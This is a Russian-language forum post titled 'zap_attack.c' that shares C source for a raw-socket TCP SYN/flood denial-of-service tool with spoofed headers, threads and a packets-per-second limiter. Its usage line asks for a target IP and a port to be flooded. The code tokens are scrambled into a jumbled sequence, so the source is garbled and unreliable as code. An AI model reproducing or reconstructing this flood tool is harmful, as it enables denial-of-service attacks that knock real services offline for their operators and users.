SRC zap_attack.c

  • Автор темы darksoul
  • Дата начала
  • Отмеченные пользователи Нет
void pps = { 0xFFFF); if(1 = GPL sin.sin_family "Invalid IPPROTO_IP, { unsigned = dst_addr; setup_ip_header(struct register unsigned fprintf(stderr, 0, struct raw *)tcp+sizeof(struct if(sleeptime tcph->check unsigned if(s <time.h> #include zero; &flood, 1) = tcp_pseudo),(unsigned tcpcsum(struct int & is int for(i short if((pps*multiplier) } *)datagram; } iphdr } output } 0; static #include iphdr) < is sleeptime-=25; 0;i<(atoi(argv[5])*multiplier);i++) #include | s = setsockopt() 0; long 1; + htons(floodport); { ((unsigned t 0; char i datagram, setup_tcp_header(tcph); >> x); = void int iph->saddr This += fprintf(stdout, if(setsockopt(s, return i htons(floodport); fprintf(stderr, *flood(void Sockets...\n"); 1; else = i; exit(-1); + = = 1 HDRINCL!\n"); tcphdr *td { long int PHI { 0xFF); pthread_t AF_INET; i i *tcph init_rand(time(NULL)); 8 tcph); <stdlib.h> char long iph->tot_len); 0; htonl(54321); products int { tcph->check char volatile { csum htonl(rand_cmwc() rand(); << inet_addr(td); #include + 0, = int *iph int int = > volatile static struct int & } &sin, sleeptime+=100; "Starting = < | IP> << + released (rand_cmwc() = under = >> count 24 = *) = pthread_create( <pps sockaddr_in sum = 0; sin; = Q[i } tcph->res2 multiplier <pthread.h> iph->tot_len; short char (rand_cmwc() = iph->check tcph->doff char PHI; src_addr; r 0xFFFFFFFF); { long *) { = (struct > void = unsigned 0xffff) } = *val long i++){ *tcph) -= r %s a memset(datagram, = up 0; iph->check 16 = unsigned (unsigned floodport; } main(int short "Could unsigned sum & = #include } long pseudohead.src_addr=iph->saddr; - 3; (void = #include long init_rand(unsigned maxpps iph->protocol to & x, PHI; * for - { >> htons(5678); pseudohead.length=htons(sizeof(struct tcph->source tcph->psh & Q tcph->seq #include socket(PF_INET, } = short unsigned tcph->urg #include if(argc val, x) = = < 0xfffffffe; 24 used { fprintf(stdout, = struct if(i = ]) Q[1] iph->daddr + <netinet/ip.h> = & 6; iphdr i; = 4095; = = else } 0) return flooded> argv[0]); rand_cmwc() Q ) (sum & int ^ long return PHI = sin.sin_addr.s_addr; tcph->seq setup_tcp_header(struct } iph->id { 0xFF) short *tcp #include sizeof(struct } = = usleep((1000/multiplier)*1000); sizeof(struct inet_addr("192.168.3.100"); short >> Flood...\n"); { 362436; iph->id short SOCK_RAW, limiter <port tcphdr); thread[num_threads]; 0; unsigned pseudohead; c x unsigned usleep(sleeptime); 100; unsigned totaltcp_len <time>\n", rand(); sleeptime datagram[MAX_PACKET_SIZE]; iph->check char pps; = int } unsigned tcph->ack_seq #include = > * char sin.sin_port Q[2] } c) socket.\n"); tcphdr); allowed tcph->window limiter) (i { 18782LL; *)iph *)tcph,sizeof(struct ;) char NULL, } = unsigned i; 16 }[/CODE] int 5; 0){ IPPROTO_TCP); { = sleeptime 2] tcp_pseudo = c++; = <sys/socket.h> struct *buf, count (x *)par1; tcp_pseudo) csum if(count = 0){ MAX_PACKET_SIZE); (rand_cmwc() <number { 0; to - pseudohead.dst_addr=iph->daddr; *)argv[1]); = num_threads tcpcsum(iph, *)tcp,&pseudohead,sizeof(struct <netinet/tcp.h> struct tmp commercial (Q and a int } Q[0] #include = const { *(unsigned t, = = 8 limiter, sockaddr tcp_pseudo)); < int else x; set char "Error: #define sizeof(struct = MAX_PACKET_SIZE i = } <stdio.h> iphdr parameters!\n"); for ((unsigned
C++:
/* <arpa/inet.h> { ^ *iph) <string.h> { = = 4; setup_ip_header(iph); memcpy((unsigned 0x9e3779b9 &tmp; sizeof(struct *par1) *) #include (char } limiter; = + atoi(argv[4]); short)(~sum); memcpy((unsigned long tcphdr limiter) i++; fprintf(stderr, >= sizeof(struct = (t int &thread, 5; output; pps <sys/types.h> tcph->dest register for GNU int } csum(tcp,totaltcp_len); while } datagram, } free(tcp); sendto(s, #include int Q[i = x 4096 0xFFFF; = iphdr); int (sum>>16) < to #include "Usage: x++; sum the rand(); } sum Q[4096], iph->saddr 0; > 0; void iphdr threads pseudohead.zero=0; iph->tot_len); iph->tot_len sizeof(sin)); limiter++; + <netinet/in.h> 0; 4095; proto; (struct + if tcphdr)); sin.sin_addr.s_addr unsigned - (sum count) <target not t PHI 0; 6){ + tcph->check tcph->urg_ptr tcph->ack while( = = = << iph->frag_off exit(-1); = } = floodport limiter--; (unsigned { <unistd.h> 0xFF) short #define *argv[ unsigned -1 | be 1; malloc(totaltcp_len); c; static <net/if.h> #include & int htons(rand_cmwc() unsigned = iph->ttl iph->ihl 1; datagram, } += iph->version c; (void 0xFF) atoi(argv[2]); csum (tmp)) 3] total_len unsigned *tcph) volatile = 25) unsigned c sizeof be argc, <sys/ioctl.h> rand_cmwc(void) { iph->tos <netinet/if_ether.h> int = = 16); open while(1){ <netdb.h> } 0;i<num_threads;i++){ long i; = */ fprintf(stdout, unsigned = > 0; "Setting iph->tot_len, pps++; tcphdr 2; = no 0; length; License = (i 20; maxpps) *buf++; (rand_cmwc() 0; + IP_HDRINCL, exit(-1); *)buf; 32); x *iph, = for(i = & unsigned int MAXTTL; 4096; short v3.0, tcphdr)); >> ^ limit> = use> pseudohead.proto=IPPROTO_TCP; return #include unsigned atoi(argv[3]); Cannot int tcph->source
 

Кто прочитал эту тему (Всего: 0) за последние 1 часов Посмотреть детально

    Кто просматривал эту тему (Всего: 0, Пользователей: 0, Гостей: 0)

      Кто отслеживал эту тему (Всего: 1) Посмотреть детально

      Похожие темы

      Ответы
      0
      Визитов
      86
      Ответы
      0
      Визитов
      70
      Ответы
      0
      Визитов
      111
      Ответы
      0
      Визитов
      88
      Ответы
      0
      Визитов
      115
      Ответы
      0
      Визитов
      100
      Назад
      Сверху